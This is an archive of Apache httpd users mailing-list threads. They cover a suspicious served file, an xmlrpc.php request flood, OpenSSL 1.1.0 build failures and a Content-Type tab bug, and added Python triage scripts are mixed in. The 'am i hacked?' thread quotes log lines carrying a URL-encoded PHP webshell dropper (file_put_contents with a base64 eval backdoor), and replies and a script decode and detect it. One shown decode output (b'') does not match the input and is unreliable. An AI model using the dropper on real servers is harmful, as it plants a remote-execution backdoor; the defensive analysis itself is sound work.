Re: [users@httpd] Possible virus via httpd server

2016-01-04 Thread Kent Frazier


You might try submitting the file at https://www.virustotal.com
and see what it detects.

On 1/4/16 8:18 AM, Michael D. Berger wrote:

Examining with Lemmy (A Windows version of VI), it looks like a binary file.
Size is 181.4 KB.
I am considering my favorite virus remover: DBAN, but it would take several
days' work to recover from that.

Mike.
--
Michael D. Berger
m.d.ber...@ieee.org
http://www.rosemike.net/



-Original Message-
From: Daniel Beardsmore [mailto:dan...@trustnetworks.co.uk]
Sent: Monday, January 04, 2016 05:03
To: users@httpd.apache.org
Subject: RE: [users@httpd] Possible virus via httpd server

Well, what do you see if you examine the file in a text editor?


-Original Message-
From: Michael D. Berger [mailto:m.d.ber...@ieee.org]
Sent: 04 January 2016 05:03
To: Apache-Users
Subject: [users@httpd] Possible virus via httpd server

Using my WinXP Firefox client to access my previously working httpd
2.4 server on Fedora 23 gets a file named 1OfvyQ5L instead of my
index.html .  Do you think I have a virus on my Linux box?  I did
notice that my iptables is not as tight as it should be.

--
Michael D. Berger
m.d.ber...@ieee.org
http://www.rosemike.net/
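Before (or alongside) a VirusTotal submission, the useful first step with an unexpected file like this is to record what it is: the format its leading bytes announce, its hashes for a lookup, and its byte entropy. The script below is an added example, not code from this thread; it classifies a blob by magic bytes with a printable-ratio fallback, computes SHA-256/MD5 and Shannon entropy, and runs on three constructed sample blobs.

```python
"""First look at an unexpected file served in place of index.html: format
from leading bytes, hashes for a VirusTotal lookup, and byte entropy.
Added example, not code from the list posts; the samples are constructed."""
import hashlib
import math
from collections import Counter

# Leading bytes of a few common formats (constructed list, not exhaustive).
MAGIC = [
    (b"\x7fELF", "ELF executable or object"),
    (b"MZ", "PE/DOS executable"),
    (b"\x1f\x8b", "gzip data"),
    (b"PK\x03\x04", "zip archive"),
    (b"#!", "script with shebang line"),
]


def file_kind(data: bytes) -> str:
    """Classify by magic bytes, falling back to a printable-ratio test."""
    for magic, name in MAGIC:
        if data.startswith(magic):
            return name
    if not data:
        return "empty"
    printable = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return "text" if printable / len(data) > 0.95 else "unrecognised binary"


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: plain text sits around 4-5,
    compressed or encrypted content approaches 8."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def triage(data: bytes) -> dict:
    """Everything needed for a first report or a hash lookup."""
    return {
        "size": len(data),
        "kind": file_kind(data),
        "entropy": round(entropy(data), 2),
        "sha256": hashlib.sha256(data).hexdigest(),
        "md5": hashlib.md5(data).hexdigest(),
    }


# Constructed samples: a minimal ELF-looking header, an HTML page, and a
# block with a flat byte distribution (maximum entropy).
SAMPLE_ELF = b"\x7fELF\x02\x01\x01" + bytes(57)
SAMPLE_HTML = b"<!DOCTYPE html>\n<html><body><p>hello</p></body></html>\n"
SAMPLE_FLAT = bytes(range(256)) * 4

if __name__ == "__main__":
    for name, blob in (("elf", SAMPLE_ELF), ("html", SAMPLE_HTML), ("flat", SAMPLE_FLAT)):
        print(name, triage(blob))
```

Run it against the real file with `triage(open("1OfvyQ5L", "rb").read())`; a high entropy on a file that claims to be HTML is itself a reason to treat it as hostile, and the SHA-256 is what to search for before uploading anything.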





-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org



Re: [users@httpd] Possible DOS Attack

2016-05-20 Thread Kent Frazier
The abuse email address for  191.96.249.52 is ab...@dmzhost.co
(though most ISPs don't seem to care whether one of their systems has
been hacked or not)

On 5/20/16 4:00 PM, Roman Gelfand wrote:
> In the last 2 days we have received roughly 1milion of the following
> requests.  Just to confirm, is this a DOS attack?
>
> 191.96.249.52 - - [20/May/2016:18:19:22 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:22 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:23 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:23 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:23 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:23 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:23 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:23 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:24 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:25 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:25 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:25 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:25 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:25 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:25 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:26 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:26 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:27 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:27 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:27 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:27 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:27 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:27 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:27 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:28 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:28 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:29 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:29 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:29 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:29 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:30 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:30 -0400] "POST /xmlrpc.php
> HTTP/1.0" 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
> 191.96.249.52 - - [20/May/2016:18:19:30 -0400] "POST /xmlrpc.php
> HT

[users@httpd] httpd-2.4.25 compile fail

2016-12-26 Thread Kent Frazier
I'm trying (unsuccessfully) to build on a Mac Pro version 10.12.2
(Sierra Darwin Kernel Version 16.3.0)

libtool (GNU libtool) 2.4

OpenSSL 1.1.0c  10 Nov 2016

/usr/local/apr/build-1/libtool --silent --mode=link
/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin/cc
 
-g -O2   -L/usr/local/lib -lssl -lcrypto -lpthread  \
 -o ab  ab.lo   /usr/local/apr/lib/libaprutil-1.la
-lexpat -liconv /usr/local/apr/lib/libapr-1.la -lpthread
Undefined symbols for architecture x86_64:
  "_CRYPTO_malloc_init", referenced from:
  _main in ab.o
  "_SSLv2_client_method", referenced from:
  _main in ab.o
ld: symbol(s) not found for architecture x86_64

anybody know what's going on?





Re: [users@httpd] problem compiling apache httpd server 2.4.25 with openssl 1.1.0c version on oel 6.8

2017-01-26 Thread Kent Frazier
I'm running 2.4.25 with openssl 1.1.0c on a MAC. I had slightly
different issues, however. I was able to adapt the patches for a 2.4.23
version available at 
https://bz.apache.org/bugzilla/attachment.cgi?id=34182&action=edit
I have no idea whether this will work for you, or whether it has been
sufficiently tested to meet your criteria. (My criterion was that I just
wanted to play with it.)

On 1/26/17 12:18 PM, Daniel wrote:
> This has been said before in the mailing list very often. AFAIK apache
> 2.4.x is not compatible with openssl 1.1.x.
>
> 2017-01-26 21:07 GMT+01:00 Stéphane Laurencelle
>  >:
>
> Hello,
>
> I'm trying to compile apache httpd 2.4.25 on oracle linux 6.8; I
> installed the openssl 1.1.0c version.
>
> Here is the line I use to configure; this one did not return any error:
>
> ./configure --prefix=/usr/local/src/httpd-2.4.25
> --with-ssl=/usr/local/ssl --enable-ssl=shared --with-mpm=worker
> --enable-so --enable-mods-shared=all --enable-proxy
> --with-apr=/usr/local/apr --with-pcre=/usr/local/pcre
>
> The next step I do is run the command make to compile the httpd
> server, and here is the error I got at the end:
>
> /usr/local/apr/build-1/libtool --silent --mode=link gcc -std=gnu99
>  -g -O2 -pthread   -lssl -lcrypto -lrt -lcrypt -lpthread  \
>  -o ab  ab.lo
>  /usr/local/apr/lib/libaprutil-1.la 
> -lexpat /usr/local/apr/lib/libapr-1.la  -lrt
> -lcrypt -lpthread -lm
> ab.o: In function `ssl_print_cert_info':
> /usr/local/src/httpd-2.4.25/support/ab.c:640: undefined reference
> to `X509_get_version'
> /usr/local/src/httpd-2.4.25/support/ab.c:642: undefined reference
> to `X509_getm_notBefore'
> /usr/local/src/httpd-2.4.25/support/ab.c:646: undefined reference
> to `X509_getm_notAfter'
> ab.o: In function `ssl_state_cb':
> /usr/local/src/httpd-2.4.25/support/ab.c:562: undefined reference
> to `SSL_in_init'
> /usr/local/src/httpd-2.4.25/support/ab.c:562: undefined reference
> to `SSL_is_server'
> ab.o: In function `sk_X509_num':
> /usr/local/include/openssl/x509.h:97: undefined reference to
> `OPENSSL_sk_num'
> ab.o: In function `sk_X509_value':
> /usr/local/include/openssl/x509.h:97: undefined reference to
> `OPENSSL_sk_value'
> ab.o: In function `test':
> /usr/local/src/httpd-2.4.25/support/ab.c:1877: undefined reference
> to `SSL_in_init'
> ab.o: In function `main':
> /usr/local/src/httpd-2.4.25/support/ab.c:2169: undefined reference
> to `TLS_client_method'
> /usr/local/src/httpd-2.4.25/support/ab.c:2468: undefined reference
> to `CRYPTO_malloc_init'
> /usr/local/src/httpd-2.4.25/support/ab.c:2470: undefined reference
> to `OPENSSL_init_ssl'
> /usr/local/src/httpd-2.4.25/support/ab.c:2471: undefined reference
> to `OPENSSL_init_ssl'
> /usr/local/src/httpd-2.4.25/support/ab.c:2480: undefined reference
> to `SSL_CTX_set_options'
> /usr/local/src/httpd-2.4.25/support/ab.c:2395: undefined reference
> to `TLS_client_method'
> collect2: ld returned 1 exit status
> make[2]: *** [ab] Error 1
> make[2]: Leaving directory `/usr/local/src/httpd-2.4.25/support'
> make[1]: *** [all-recursive] Error 1
> make[1]: Leaving directory `/usr/local/src/httpd-2.4.25/support'
> make: *** [all-recursive] Error 1
> [root@mandos httpd-2.4.25]
>
> Hope someone has a solution; I found some stuff about a bug on the
> 2.4.23 version and the guys had to go back to the openssl 1.0.x
> version.
>
> Best regards,
>
> Stephane
>
>
>
>
>
>
> -- 
> *Daniel Ferradal*
> IT Specialist
>
> emaildferradal at gmail.com 
> linkedin es.linkedin.com/in/danielferradal
> 
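This thread and the macOS build failure above are the same problem in two shapes: `ab` referencing symbols that the OpenSSL the linker found does not export. The script below is an added example, not httpd code and not any of the patches mentioned. It extracts the undefined symbols from either Apple ld or GNU ld output, tolerating the mail quoting and line wrapping of this archive, and says which side of the OpenSSL 1.1.0 API break each one sits on: SSLv2 methods and CRYPTO_malloc_init were removed in 1.1.0, while TLS_client_method, OPENSSL_init_ssl, OPENSSL_sk_num and the X509 getters exist only from 1.1.0 (SSL_is_server from 1.0.2). The two sample inputs are the linker excerpts quoted on this page.

```python
"""Classify the undefined OpenSSL symbols of a failed link by which side of
the OpenSSL 1.1.0 API break they sit on.  Added example, not httpd code."""
import re

# Exported by OpenSSL 1.0.x (CRYPTO_malloc_init as a macro) but gone in 1.1.0.
REMOVED_IN_110 = {
    "SSLv2_client_method": "SSLv2 was deleted in 1.1.0; use TLS_client_method()",
    "SSLv2_server_method": "SSLv2 was deleted in 1.1.0; use TLS_server_method()",
    "SSLv2_method": "SSLv2 was deleted in 1.1.0; use TLS_method()",
    "CRYPTO_malloc_init": "1.0.x macro, dropped in 1.1.0; initialisation is automatic",
}
# Only exported as functions by newer OpenSSL: 1.1.0 for all of these except
# SSL_is_server (1.0.2).  Older releases had them as macros or not at all, so
# an undefined reference means 1.1.0 headers were paired with an older library.
NEWER_API = {
    "TLS_client_method", "TLS_server_method", "TLS_method",
    "OPENSSL_init_ssl", "OPENSSL_init_crypto", "OPENSSL_sk_num", "OPENSSL_sk_value",
    "X509_get_version", "X509_getm_notBefore", "X509_getm_notAfter",
    "SSL_in_init", "SSL_is_server", "SSL_CTX_set_options",
}

MACOS_LD = re.compile(r'^\s*"_(\w+)", referenced from:', re.M)  # Apple ld
GNU_LD = re.compile(r"undefined reference\s+to\s+`(\w+)'")      # GNU ld / collect2


def undefined_symbols(linker_output):
    """Unique undefined symbols, in order of appearance, from Apple ld or GNU
    ld output.  Leading '> ' mail quoting and wrapped lines are tolerated."""
    text = "\n".join(re.sub(r"^>\s?", "", ln) for ln in linker_output.splitlines())
    out = []
    for sym in MACOS_LD.findall(text) + GNU_LD.findall(text):
        if sym not in out:
            out.append(sym)
    return out


def diagnose(linker_output):
    """Split the symbols into removed-in-1.1.0 / newer-than-the-library /
    unknown and state the most likely cause."""
    syms = undefined_symbols(linker_output)
    removed = [s for s in syms if s in REMOVED_IN_110]
    newer = [s for s in syms if s in NEWER_API]
    unknown = [s for s in syms if s not in REMOVED_IN_110 and s not in NEWER_API]
    if newer:
        verdict = ("header/library mismatch: compiled against OpenSSL >= 1.1.0 headers, "
                   "but -lssl/-lcrypto resolved to an older library (check -L, "
                   "--with-ssl and the runtime linker path)")
    elif removed:
        verdict = ("OpenSSL 1.1.0 library, pre-1.1.0 source: the code calls APIs that "
                   "1.1.0 removed; patch the source for the 1.1.0 API or build against 1.0.2")
    else:
        verdict = "no OpenSSL 1.1.0 transition symbols among the undefined ones"
    return {"symbols": syms, "removed": removed, "newer": newer,
            "unknown": unknown, "verdict": verdict}


# Linker output quoted in the two threads (Apple ld on macOS, GNU ld on
# OEL 6.8; the OEL excerpt keeps the archive's '> ' quoting and wrapping).
MAC_LD = """\
Undefined symbols for architecture x86_64:
  "_CRYPTO_malloc_init", referenced from:
      _main in ab.o
  "_SSLv2_client_method", referenced from:
      _main in ab.o
ld: symbol(s) not found for architecture x86_64
"""
OEL_LD = """\
> ab.o: In function `ssl_print_cert_info':
> /usr/local/src/httpd-2.4.25/support/ab.c:640: undefined reference
> to `X509_get_version'
> /usr/local/src/httpd-2.4.25/support/ab.c:642: undefined reference
> to `X509_getm_notBefore'
> ab.o: In function `ssl_state_cb':
> /usr/local/src/httpd-2.4.25/support/ab.c:562: undefined reference
> to `SSL_in_init'
> /usr/local/src/httpd-2.4.25/support/ab.c:562: undefined reference
> to `SSL_is_server'
> ab.o: In function `sk_X509_num':
> /usr/local/include/openssl/x509.h:97: undefined reference to
> `OPENSSL_sk_num'
> ab.o: In function `test':
> /usr/local/src/httpd-2.4.25/support/ab.c:1877: undefined reference
> to `SSL_in_init'
> ab.o: In function `main':
> /usr/local/src/httpd-2.4.25/support/ab.c:2169: undefined reference
> to `TLS_client_method'
> /usr/local/src/httpd-2.4.25/support/ab.c:2468: undefined reference
> to `CRYPTO_malloc_init'
> /usr/local/src/httpd-2.4.25/support/ab.c:2470: undefined reference
> to `OPENSSL_init_ssl'
> /usr/local/src/httpd-2.4.25/support/ab.c:2480: undefined reference
> to `SSL_CTX_set_options'
> collect2: ld returned 1 exit status
"""

if __name__ == "__main__":
    for name, out in (("macOS", MAC_LD), ("OEL 6.8", OEL_LD)):
        d = diagnose(out)
        print(name, d["removed"], d["newer"], d["unknown"])
        print("  ->", d["verdict"])
```

For the OEL case the telling symbol is `CRYPTO_malloc_init` appearing next to `OPENSSL_init_ssl`: the 1.1.0 headers no longer define the old macro, so the call became a plain function reference that no library exports, while the new functions are missing because the `-lssl -lcrypto` on that link line (with no `-L`) picked up the system OpenSSL rather than the one under /usr/local/ssl.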




Re: [users@httpd] am i hacked ?

2017-02-06 Thread Kent Frazier

If you have python installed...
The following python script shows some simple commands for decoding (for 
future reference).


# Imports first; the text below is the pair of log lines as quoted upthread,
# kept with the mail wrapping so the output matches what follows.
import base64
import urllib.parse

test = """ 
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> 
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B

> HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
> 
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> 
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B

> HTTP/1.1" 200 90"""

# Undo the %XX URL-encoding of the whole excerpt.
print(urllib.parse.unquote(test))
# Decode the base64 argument the request passes to base64_decode().
print(base64.b64decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'))

It yields...
python unquote.py
 
/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
 '->|';file_put_contents($_SERVER['DOCUME
> 
NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo 
'|<-';

> HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
> 
/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo 
'->|';file_put_contents($_SERVER['DOCUME
> 
NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo 
'|<-';

> HTTP/1.1" 200 90
b''

I also have a program that attempts to get an email address to notify in 
the event of abuse. It yields the following.


python getAbuseEmail.py 91.200.12.33
['n...@lugalink.net']

though it is unlikely you'll get a response ;-)


On 2/6/2017 8:36 AM, Jack Swan wrote:

I didn't decode it all.  I'll leave the rest up to you, but the %characters are 
hexadecimal characters.  Look up hex charset.

So the first line translates to (I may have missed a char or two...)

GET/?1=@ini_set("display_errors", 
0);set_time_limit("0");@set_magic_quotes_runtime();echo  
'->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
 '|<-';


- Original Message -
From: bernd.len...@helmholtz-muenchen.de
To: users@httpd.apache.org
Sent: Monday, February 6, 2017 11:15:04 AM GMT -05:00 US/Canada Eastern
Subject: [users@httpd] am i hacked ?

Hi,

Just now I found two very weird entries in my access_log:

91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90
91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90

What upsets me is that these two requests have status code 200, which means they
were successful.
The IP is from Ukraine. Where can I find out what these %characters mean?
Does anyone understand what happened here? It's apache 2.2.3 64bit.

Thanks for any hint.

Bernd
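Two access_log checks from these threads, in one added script (not code from any of the posts): a per-source burst counter for floods like the xmlrpc.php POSTs in the "Possible DOS Attack" thread above, and a decoder for URL-encoded query strings like the ones in this thread, which pulls out the base64 argument and the file the payload tries to write. A 200 on `GET /?1=...` only says that the resource at `/` was served; the query string does nothing unless some script on the host evaluates it, so the decisive check is whether the file the request named, webconfig.txt.php, now exists under DOCUMENT_ROOT, and the script ends with that check. The flood lines are constructed to mirror the quoted ones; the webshell line is Bernd's first log line re-joined.

```python
"""Access_log triage: request-rate bursts per source, and decoding of encoded
query strings.  Added example, not code from the posts.  Flood lines are
constructed; the encoded request is the one quoted in the thread."""
import base64
import binascii
import os
import re
import urllib.parse
from collections import defaultdict, deque
from datetime import datetime

# One access_log line.  The optional "\d+ " before the request string is the
# extra field in Bernd's LogFormat; plain common/combined lines match too.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] (?:\d+ )?'
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Dict of fields for a log line, or None if it is not an access_log line."""
    m = LOG_RE.match(line.lstrip("> ").strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["path"] = rec["target"].partition("?")[0]
    return rec


def find_bursts(lines, window_s=10, threshold=20):
    """{(ip, path): peak count} for sources hitting one path more than
    `threshold` times inside any `window_s`-second window (time-ordered input)."""
    recent, peaks = defaultdict(deque), {}
    for rec in filter(None, map(parse_line, lines)):
        key = (rec["ip"], rec["path"])
        q = recent[key]
        q.append(rec["time"])
        while (q[-1] - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) > threshold:
            peaks[key] = max(peaks.get(key, 0), len(q))
    return peaks


# Substrings that mark a query string as carrying PHP meant to be eval()'d.
INDICATORS = ("file_put_contents(", "eval(", "base64_decode(",
              "$_SERVER['DOCUMENT_ROOT']", "set_magic_quotes_runtime(", "ini_set(")


def decode_query(target):
    """URL-decode each parameter, decode base64_decode('...') arguments, and
    pull out the file the payload would write under DOCUMENT_ROOT."""
    params = {}
    for part in target.partition("?")[2].split("&"):
        if part:
            k, _, v = part.partition("=")
            params[urllib.parse.unquote(k)] = urllib.parse.unquote(v)
    text = "\n".join(params.values())
    blobs = []
    for b64 in re.findall(r"base64_decode\('([A-Za-z0-9+/=]+)'\)", text):
        try:
            blobs.append(base64.b64decode(b64, validate=True))
        except binascii.Error:
            pass
    scan = text + "".join("\n" + b.decode("latin-1") for b in blobs)
    return {"params": params,
            "indicators": [i for i in INDICATORS if i in scan],
            "writes": re.findall(r"file_put_contents\(\$_SERVER\['DOCUMENT_ROOT'\]\.'([^']+)'", text),
            "blobs": blobs}


def triage(lines):
    """Findings for every line whose query string carries the indicators."""
    findings = []
    for rec in filter(None, map(parse_line, lines)):
        d = decode_query(rec["target"])
        if d["indicators"]:
            findings.append({"ip": rec["ip"], "status": rec["status"], "path": rec["path"], **d})
    return findings


def dropped_files_present(findings, docroot):
    """Paths the payloads tried to create that actually exist under docroot:
    the check that decides whether a 200 on "GET /?1=..." did any harm."""
    wanted = {os.path.join(docroot, w.lstrip("/")) for f in findings for w in f["writes"]}
    return sorted(p for p in wanted if os.path.exists(p))


BENIGN = ['203.0.113.7 - - [20/May/2016:18:19:21 -0400] "GET /index.html HTTP/1.1" 200 1043 "-" "curl/7.47.0"']
FLOOD = [f'191.96.249.52 - - [20/May/2016:18:19:{22 + i // 4:02d} -0400] "POST /xmlrpc.php HTTP/1.0"'
         f' 500 251 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"' for i in range(32)]
WEBSHELL = [
    '91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors'
    '%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20'
    '%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php'
    '%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B'
    ' HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    print("bursts:", find_bursts(BENIGN + FLOOD))
    for f in triage(WEBSHELL):
        print(f["ip"], f["status"], "writes", f["writes"], "payload", f["blobs"])
    print("present:", dropped_files_present(triage(WEBSHELL), "/var/www/html"))
```

`find_bursts` keys on (source, path) rather than source alone so that a crawler touching many pages is not confused with one client hammering a single endpoint; tune `window_s` and `threshold` to the site's normal rate. If `dropped_files_present` returns a path on a real host, the server is running something that evaluates request parameters and the file should be treated as a backdoor.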







Re: [users@httpd] Malformed header "Content-Type: text/plain\t" with .el file

2017-04-11 Thread Kent Frazier

On 4/11/2017 12:15 PM, Hanno Böck wrote:

Hi,

I am observing a behavior and don't really know how to make sense of
it. It may very well be that I hit a bug, but I wanted to ask for
feedback to confirm it.

When I download .el files (EMACS Lisp scripts) on an apache server I
get a very strange header back:
"Content-Type: text/plain\t"

Please note the "\t" at the end, which shouldn't be here.
I can reproduce this on different Gentoo systems, but not on Debian or
Ubuntu.

To reproduce:
* Put a .el script in the webroot, e.g. get one from here:
https://git.savannah.gnu.org/cgit/emacs.git/plain/lisp/abbrev.el
* Download it with "wget -S [url]" (-S makes wget show all the
   HTTP headers).
For testing I have put an example on my server:
https://files.hboeck.de/abbrev.el
(the header contains an additional charset=UTF-8, because that's
configured as default on that server, but it still shows the strange
"\t")

The "magic" file shipped with httpd contains this, and I think this is
the source:
0   string  ;;  text/plain  8bit

I guess somehow the tab past the content type isn't stripped away, but
instead escaped and left in the header.

Can others confirm this behavior? Ideas how to fix this?


